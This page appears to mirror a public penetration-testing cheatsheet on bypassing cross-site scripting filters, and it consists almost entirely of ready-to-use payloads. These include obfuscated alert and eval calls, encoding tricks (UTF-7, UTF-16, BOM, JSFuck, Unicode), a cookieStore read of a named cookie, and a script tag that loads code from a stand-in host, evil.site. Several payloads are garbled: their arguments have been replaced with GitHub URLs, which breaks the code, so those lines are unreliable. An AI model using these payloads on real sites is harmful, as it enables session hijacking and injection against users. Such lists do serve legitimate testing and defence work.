daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

1-xss-filter-bypass.md (19816B)


      1 ---
      2 title: "XSS Filter Bypass"
      3 topic: "XSS Injection"
      4 topicSlug: "xss-injection"
      5 sourcePath: "XSS Injection/1 - XSS Filter Bypass.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/XSS%20Injection/1%20-%20XSS%20Filter%20Bypass.md"
      7 sha: "3ac27901c711"
      8 isReadme: false
      9 ---
     10 
     11 # XSS Filter Bypass
     12 
     13 ## Summary
     14 
     15 - [Bypass Case Sensitive](#bypass-case-sensitive)
     16 - [Bypass Tag Blacklist](#bypass-tag-blacklist)
     17 - [Bypass Word Blacklist with Code Evaluation](#bypass-word-blacklist-with-code-evaluation)
     18 - [Bypass with Incomplete HTML Tag](#bypass-with-incomplete-html-tag)
     19 - [Bypass Quotes for String](#bypass-quotes-for-string)
     20 - [Bypass Quotes in Script Tag](#bypass-quotes-in-script-tag)
     21 - [Bypass Quotes in Mousedown Event](#bypass-quotes-in-mousedown-event)
     22 - [Bypass Dot Filter](#bypass-dot-filter)
     23 - [Bypass Parenthesis for String](#bypass-parenthesis-for-string)
     24 - [Bypass Parenthesis and Semi Colon](#bypass-parenthesis-and-semi-colon)
     25 - [Bypass onxxxx= Blacklist](#bypass-onxxxx-blacklist)
     26 - [Bypass Space Filter](#bypass-space-filter)
     27 - [Bypass Email Filter](#bypass-email-filter)
     28 - [Bypass Tel URI Filter](#bypass-tel-uri-filter)
     29 - [Bypass document Blacklist](#bypass-document-blacklist)
     30 - [Bypass document.cookie Blacklist](#bypass-documentcookie-blacklist)
     31 - [Bypass using Javascript Inside a String](#bypass-using-javascript-inside-a-string)
     32 - [Bypass using an Alternate Way to Redirect](#bypass-using-an-alternate-way-to-redirect)
     33 - [Bypass using an Alternate Way to Execute an Alert](#bypass-using-an-alternate-way-to-execute-an-alert)
     34 - [Bypass ">" using Nothing](#bypass--using-nothing)
     35 - [Bypass "<" and ">" using < and >](#bypass--and--using--and-)
     36 - [Bypass ";" using Another Character](#bypass--using-another-character)
     37 - [Bypass using Missing Charset Header](#bypass-using-missing-charset-header)
     38 - [Bypass using HTML encoding](#bypass-using-html-encoding)
     39 - [Bypass using Katakana](#bypass-using-katakana)
     40 - [Bypass using Cuneiform](#bypass-using-cuneiform)
     41 - [Bypass using Lontara](#bypass-using-lontara)
     42 - [Bypass using ECMAScript6](#bypass-using-ecmascript6)
     43 - [Bypass using Octal encoding](#bypass-using-octal-encoding)
     44 - [Bypass using Unicode](#bypass-using-unicode)
     45 - [Bypass using UTF-7](#bypass-using-utf-7)
     46 - [Bypass using UTF-8](#bypass-using-utf-8)
     47 - [Bypass using UTF-16be](#bypass-using-utf-16be)
     48 - [Bypass using UTF-32](#bypass-using-utf-32)
     49 - [Bypass using BOM](#bypass-using-bom)
     50 - [Bypass using JSfuck](#bypass-using-jsfuck)
     51 - [References](#references)
     52 
     53 ## Bypass Case Sensitive
     54 
     55 To bypass a case-sensitive XSS filter, you can try mixing uppercase and lowercase letters within the tags or function names.
     56 
     57 ```javascript
     58 <sCrIpt>alert(1)</ScRipt>
     59 <ScrIPt>alert(1)</ScRipT>
     60 ```
     61 
     62 Since many XSS filters only recognize exact lowercase or uppercase patterns, this can sometimes evade detection by tricking simple case-sensitive filters.
     63 
     64 ## Bypass Tag Blacklist
     65 
     66 ```javascript
     67 <script x>
     68 <script x>alert('XSS')<script y>
     69 ```
     70 
     71 ## Bypass Word Blacklist with Code Evaluation
     72 
     73 ```javascript
     74 eval('ale'+'rt(0)');
     75 Function("ale"+"rt(1)")();
     76 new Function`al\ert\`6\``;
     77 setTimeout('ale'+'rt(2)');
     78 setInterval('ale'+'rt(10)');
     79 Set.constructor('ale'+'rt(13)')();
     80 Set.constructor`al\x65rt\x2814\x29```;
     81 ```
     82 
     83 ## Bypass with Incomplete HTML Tag
     84 
     85 Works on IE/Firefox/Chrome/Safari
     86 
     87 ```javascript
     88 <img src='1' onerror='alert(0)' <
     89 ```
     90 
     91 ## Bypass Quotes for String
     92 
     93 ```javascript
     94 String.fromCharCode(88,83,83)
     95 ```
     96 
     97 ## Bypass Quotes in Script Tag
     98 
     99 ```javascript
    100 http://localhost/bla.php?test=</script><script>alert(1)</script>
    101 <html>
    102   <script>
    103     <?php echo 'foo="text '.$_GET['test'].'";';`?>
    104   </script>
    105 </html>
    106 ```
    107 
    108 ## Bypass Quotes in Mousedown Event
    109 
    110 You can bypass a single quote with &#39; in an on mousedown event handler
    111 
    112 ```javascript
    113 <a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a>
    114 ```
    115 
    116 ## Bypass Dot Filter
    117 
    118 ```javascript
    119 <script>window['alert'](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/document%5B%27domain%27%5D)</script>
    120 ```
    121 
    122 Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777`
    123 
    124 ```javascript
    125 <script>eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))<script>
    126 ```
    127 
    128 Base64 encoding your XSS payload with Linux command: IE. `echo -n "alert(document.cookie)" | base64` == `YWxlcnQoZG9jdW1lbnQuY29va2llKQ==`
    129 
    130 ## Bypass Parenthesis for String
    131 
    132 ```javascript
    133 alert`1`
    134 setTimeout`alert\u0028document.domain\u0029`;
    135 ```
    136 
    137 ## Bypass Parenthesis and Semi Colon
    138 
    139 - From @garethheyes
    140 
    141     ```javascript
    142     <script>onerror=alert;throw 1337</script>
    143     <script>{onerror=alert}throw 1337</script>
    144     <script>throw onerror=alert,'some string',123,'haha'</script>
    145     ```
    146 
    147 - From @terjanq
    148 
    149     ```js
    150     <script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script>
    151     ```
    152 
    153 - From @cgvwzq
    154 
    155     ```js
    156     <script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script>
    157     ```
    158 
    159 ## Bypass onxxxx Blacklist
    160 
    161 - Use less known tag
    162 
    163     ```html
    164     <object onafterscriptexecute=confirm(0)>
    165     <object onbeforescriptexecute=confirm(0)>
    166     ```
    167 
    168 - Bypass onxxx= filter with a null byte/vertical tab/Carriage Return/Line Feed
    169 
    170     ```html
    171     <img src='1' onerror\x00=alert(0) />
    172     <img src='1' onerror\x0b=alert(0) />
    173     <img src='1' onerror\x0d=alert(0) />
    174     <img src='1' onerror\x0a=alert(0) />
    175     ```
    176 
    177 - Bypass onxxx= filter with a '/'
    178 
    179     ```js
    180     <img src='1' onerror/=alert(0) />
    181     ```
    182 
    183 ## Bypass Space Filter
    184 
    185 - Bypass space filter with "/"
    186 
    187     ```javascript
    188     <img/src='1'/onerror=alert(0)>
    189     ```
    190 
    191 - Bypass space filter with `0x0c/^L` or `0x0d/^M` or `0x0a/^J` or `0x09/^I`
    192 
    193   ```html
    194   <svgonload=alert(1)>
    195   ```
    196 
    197 ```ps1
    198 $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
    199 00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c  <svg.onload.=.al
    200 00000010: 6572 7428 3129 0c3e 0a                   ert(1).>.
    201 ```
    202 
    203 ## Bypass Email Filter
    204 
    205 - [RFC0822 compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate)
    206 
    207   ```javascript
    208   "><svg/onload=confirm(1)>"@x.y
    209   ```
    210 
    211 - [RFC5322 compliant](https://0dave.ch/posts/rfc5322-fun/)
    212 
    213   ```javascript
    214   xss@example.com(<img src='x' onerror='alert(document.location)'>)
    215   ```
    216 
    217 ## Bypass Tel URI Filter
    218 
    219 At least 2 RFC mention the `;phone-context=` descriptor:
    220 
    221 - [RFC3966 - The tel URI for Telephone Numbers](https://www.ietf.org/rfc/rfc3966.txt)
    222 - [RFC2806 - URLs for Telephone Calls](https://www.ietf.org/rfc/rfc2806.txt)
    223 
    224 ```javascript
    225 +330011223344;phone-context=<script>alert(0)</script>
    226 ```
    227 
    228 ## Bypass Document Blacklist
    229 
    230 ```javascript
    231 <div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
    232 window["doc"+"ument"]
    233 ```
    234 
    235 ## Bypass document.cookie Blacklist
    236 
    237 This is another way to access cookies on Chrome, Edge, and Opera. Replace COOKIE NAME with the cookie you are after. You may also investigate the getAll() method if that suits your requirements.
    238 
    239 ```js
    240 window.cookieStore.get('COOKIE NAME').then((cookieValue)=>{alert(cookieValue.value);});
    241 ```
    242 
    243 ## Bypass using Javascript Inside a String
    244 
    245 ```javascript
    246 <script>
    247 foo="text </script><script>alert(1)</script>";
    248 </script>
    249 ```
    250 
    251 ## Bypass using an Alternate Way to Redirect
    252 
    253 ```javascript
    254 location="http://google.com"
    255 document.location = "http://google.com"
    256 document.location.href="http://google.com"
    257 window.location.assign("http://google.com")
    258 window['location']['href']="http://google.com"
    259 ```
    260 
    261 ## Bypass using an Alternate Way to Execute an Alert
    262 
    263 From [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040) tweet.
    264 
    265 ```javascript
    266 window['alert'](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/0)
    267 parent['alert'](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/1)
    268 self['alert'](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/2)
    269 top['alert'](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/3)
    270 this['alert'](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/4)
    271 frames['alert'](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/5)
    272 content['alert'](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/6)
    273 
    274 [7].map(alert)
    275 [8].find(alert)
    276 [9].every(alert)
    277 [10].filter(alert)
    278 [11].findIndex(alert)
    279 [12].forEach(alert);
    280 ```
    281 
    282 From [@theMiddle](https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/) - Using global variables
    283 
    284 The Object.keys() method returns an array of a given object's own property names, in the same order as we get with a normal loop. That's means that we can access any JavaScript function by using its **index number instead the function name**.
    285 
    286 ```javascript
    287 c=0; for(i in self) { if(i == "alert") { console.log(c); } c++; }
    288 // 5
    289 ```
    290 
    291 Then calling alert is :
    292 
    293 ```javascript
    294 Object.keys(self)[5]
    295 // "alert"
    296 self[Object.keys(self)[5]]("1") // alert("1")
    297 ```
    298 
    299 We can find "alert" with a regular expression like ^a[rel]+t$ :
    300 
    301 ```javascript
    302 //bind function alert on new function a()
    303 a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}} 
    304 
    305 // then you can use a() with Object.keys
    306 self[Object.keys(self)[a()]]("1") // alert("1")
    307 ```
    308 
    309 Oneliner:
    310 
    311 ```javascript
    312 a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]]("1")
    313 ```
    314 
    315 From [@quanyang](https://twitter.com/quanyang/status/1078536601184030721) tweet.
    316 
    317 ```javascript
    318 prompt`${document.domain}`
    319 document.location='java\tscript:alert(1)'
    320 document.location='java\rscript:alert(1)'
    321 document.location='java\tscript:alert(1)'
    322 ```
    323 
    324 From [@404death](https://twitter.com/404death/status/1011860096685502464) tweet.
    325 
    326 ```javascript
    327 eval('ale'+'rt(0)');
    328 Function("ale"+"rt(1)")();
    329 new Function`al\ert\`6\``;
    330 
    331 constructor.constructor("aler"+"t(3)")();
    332 [].filter.constructor('ale'+'rt(4)')();
    333 
    334 top["al"+"ert"](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/5);
    335 top[8680439..toString(30)](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/7);
    336 top[/al/.source+/ert/.source](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/8);
    337 top['al\x65rt'](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/9);
    338 
    339 open('java'+'script:ale'+'rt(11)');
    340 location='javascript:ale'+'rt(12)';
    341 
    342 setTimeout`alert\u0028document.domain\u0029`;
    343 setTimeout('ale'+'rt(2)');
    344 setInterval('ale'+'rt(10)');
    345 Set.constructor('ale'+'rt(13)')();
    346 Set.constructor`al\x65rt\x2814\x29```;
    347 ```
    348 
    349 Bypass using an alternate way to trigger an alert
    350 
    351 ```javascript
    352 var i = document.createElement("iframe");
    353 i.onload = function(){
    354   i.contentWindow.alert(1);
    355 }
    356 document.appendChild(i);
    357 
    358 // Bypassed security
    359 XSSObject.proxy = function (obj, name, report_function_name, exec_original) {
    360       var proxy = obj[name];
    361       obj[name] = function () {
    362         if (exec_original) {
    363           return proxy.apply(this, arguments);
    364         }
    365       };
    366       XSSObject.lockdown(obj, name);
    367   };
    368 XSSObject.proxy(window, 'alert', 'window.alert', false);
    369 ```
    370 
    371 ## Bypass ">" using Nothing
    372 
    373 There is no need to close the tags, the browser will try to fix it.
    374 
    375 ```javascript
    376 <svg onload=alert(1)//
    377 ```
    378 
    379 ## Bypass "<" and ">" using < and >
    380 
    381 Use Unicode characters `U+FF1C` and `U+FF1E`, refer to [Bypass using Unicode](#bypass-using-unicode) for more.
    382 
    383 ```javascript
    384 <script/src=//evil.site/poc.js>
    385 ```
    386 
    387 ## Bypass ";" using Another Character
    388 
    389 ```javascript
    390 'te' * alert('*') * 'xt';
    391 'te' / alert('/') / 'xt';
    392 'te' % alert('%') % 'xt';
    393 'te' - alert('-') - 'xt';
    394 'te' + alert('+') + 'xt';
    395 'te' ^ alert('^') ^ 'xt';
    396 'te' > alert('>') > 'xt';
    397 'te' < alert('<') < 'xt';
    398 'te' == alert('==') == 'xt';
    399 'te' & alert('&') & 'xt';
    400 'te' , alert(',') , 'xt';
    401 'te' | alert('|') | 'xt';
    402 'te' ? alert('ifelsesh') : 'xt';
    403 'te' in alert('in') in 'xt';
    404 'te' instanceof alert('instanceof') instanceof 'xt';
    405 ```
    406 
    407 ## Bypass using Missing Charset Header
    408 
    409 **Requirements**:
    410 
    411 - Server header missing `charset`: `Content-Type: text/html`
    412 
    413 ### ISO-2022-JP
    414 
    415 ISO-2022-JP uses escape characters to switch between several character sets.
    416 
    417 | Escape    | Encoding        |
    418 | --------- | --------------- |
    419 | `\x1B (B` | ASCII           |
    420 | `\x1B (J` | JIS X 0201 1976 |
    421 | `\x1B $@` | JIS X 0208 1978 |
    422 | `\x1B $B` | JIS X 0208 1983 |
    423 
    424 Using the [code table](https://en.wikipedia.org/wiki/JIS_X_0201#Codepage_layout), we can find multiple characters that will be transformed when switching from **ASCII** to **JIS X 0201 1976**.
    425 
    426 | Hex  | ASCII | JIS X 0201 1976 |
    427 | ---- | ----- | --------------- |
    428 | 0x5c | `\`   | `¥`             |
    429 | 0x7e | `~`   | `‾`             |
    430 
    431 **Example**:
    432 
    433 Use `%1b(J` to force convert a `\'` (ascii) in to `¥'` (JIS X 0201 1976), unescaping the quote.
    434 
    435 Payload: `search=%1b(J&lang=en";alert(1)//`
    436 
    437 ## Bypass using HTML Encoding
    438 
    439 ```javascript
    440 %26%2397;lert(1)
    441 &#97;&#108;&#101;&#114;&#116;
    442 ></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
    443 ```
    444 
    445 ## Bypass using Katakana
    446 
    447 Using the [aemkei/Katakana](https://github.com/aemkei/katakana.js) library.
    448 
    449 ```javascript
    450 javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/%E3%83%9F%2B%E3%83%8F%2B%E3%82%BB%2B%E3%83%9B%2B%E3%83%8D%2B%27%28-~%E3%82%A6)')()
    451 ```
    452 
    453 ## Bypass using Cuneiform
    454 
    455 ```javascript
    456 𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
    457 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
    458 +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
    459 +𒀟][𒁹](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/%F0%92%80%83%5B%F0%92%80%80%5D%2B%F0%92%80%83%5B%F0%92%88%AB%5D%2B%F0%92%89%BA%5B%F0%92%80%86%5D%2B%F0%92%80%9F%2B%F0%92%8C%90%2B%22%28%F0%92%80%80)")()
    460 ```
    461 
    462 ## Bypass using Lontara
    463 
    464 ```javascript
    465 ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/%E1%A8%8E%5B%E1%A8%86%5D%2B%E1%A8%8E%5B%E1%A8%8F%5D%2B%E1%A8%8A%5B%E1%A8%83%5D%2B%E1%A8%8B%2B%E1%A8%87%2B%22%28%E1%A8%86)")()
    466 ```
    467 
    468 More alphabets on [aem1k.com/aurebesh.js](http://aem1k.com/aurebesh.js/)
    469 
    470 ## Bypass using ECMAScript6
    471 
    472 ```html
    473 <script>alert&DiacriticalGrave;1&DiacriticalGrave;</script>
    474 ```
    475 
    476 ## Bypass using Octal encoding
    477 
    478 ```javascript
    479 javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'
    480 ```
    481 
    482 ## Bypass using Unicode
    483 
    484 This payload takes advantage of Unicode escape sequences to obscure the JavaScript function
    485 
    486 ```html
    487 <script>\u0061\u006C\u0065\u0072\u0074(1)</script>
    488 ```
    489 
    490 It uses Unicode escape sequences to represent characters.
    491 
    492 | Unicode  | ASCII |
    493 | -------- | ----- |
    494 | `\u0061` | a     |
    495 | `\u006C` | l     |
    496 | `\u0065` | e     |
    497 | `\u0072` | r     |
    498 | `\u0074` | t     |
    499 
    500 Same thing with these Unicode characters.
    501 
    502 | Unicode (UTF-8 encoded) | Unicode Name                 | ASCII | ASCII Name     |
    503 | ----------------------- | ---------------------------- | ----- | -------------- |
    504 | `\uFF1C` (%EF%BC%9C)    | FULLWIDTH LESS­THAN SIGN      | <     | LESS­THAN       |
    505 | `\uFF1E` (%EF%BC%9E)    | FULLWIDTH GREATER­THAN SIGN   | >     | GREATER­THAN    |
    506 | `\u02BA` (%CA%BA)       | MODIFIER LETTER DOUBLE PRIME | "     | QUOTATION MARK |
    507 | `\u02B9` (%CA%B9)       | MODIFIER LETTER PRIME        | '     | APOSTROPHE     |
    508 
    509 An example payload could be `ʺ><svg onload=alert(/XSS/)>/`, which would look like that after being URL encoded:
    510 
    511 ```javascript
    512 %CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert%28/XSS/%29%EF%BC%9E/
    513 ```
    514 
    515 When Unicode characters are converted to another case, they might bypass a filter look for specific keywords.
    516 
    517 | Unicode      | Transform       | Character |
    518 | ------------ | --------------- | --------- |
    519 | `İ` (%c4%b0) | `toLowerCase()` | i         |
    520 | `ı` (%c4%b1) | `toUpperCase()` | I         |
    521 | `ſ` (%c5%bf) | `toUpperCase()` | S         |
    522 | `K` (%E2%84) | `toLowerCase()` | k         |
    523 
    524 The following payloads become valid HTML tags after being converted.
    525 
    526 ```html
    527 <ſvg onload=... >
    528 <ıframe id=x onload=>
    529 ```
    530 
    531 ## Bypass using UTF-7
    532 
    533 ```javascript
    534 +ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
    535 ```
    536 
    537 ## Bypass using UTF-8
    538 
    539 ```javascript
    540 < = %C0%BC = %E0%80%BC = %F0%80%80%BC
    541 > = %C0%BE = %E0%80%BE = %F0%80%80%BE
    542 ' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
    543 " = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
    544 " = %CA%BA
    545 ' = %CA%B9
    546 ```
    547 
    548 ## Bypass using UTF-16be
    549 
    550 ```javascript
    551 %00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00
    552 \x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>
    553 ```
    554 
    555 ## Bypass using UTF-32
    556 
    557 ```js
    558 %00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
    559 ```
    560 
    561 ## Bypass using BOM
    562 
    563 Byte Order Mark (The page must begin with the BOM character.)
    564 BOM character allows you to override charset of the page
    565 
    566 ```js
    567 BOM Character for UTF-16 Encoding:
    568 Big Endian : 0xFE 0xFF
    569 Little Endian : 0xFF 0xFE
    570 XSS : %fe%ff%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E
    571 
    572 BOM Character for UTF-32 Encoding:
    573 Big Endian : 0x00 0x00 0xFE 0xFF
    574 Little Endian : 0xFF 0xFE 0x00 0x00
    575 XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
    576 ```
    577 
    578 ## Bypass using JSfuck
    579 
    580 Bypass using [jsfuck](http://www.jsfuck.com/)
    581 
    582 ```javascript
    583 [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
    584 ```
    585 
    586 ## References
    587 
    588 - [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities - Brett Buerhaus (@bbuerhaus) - March 8, 2017](https://web.archive.org/web/20170330144550/https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/)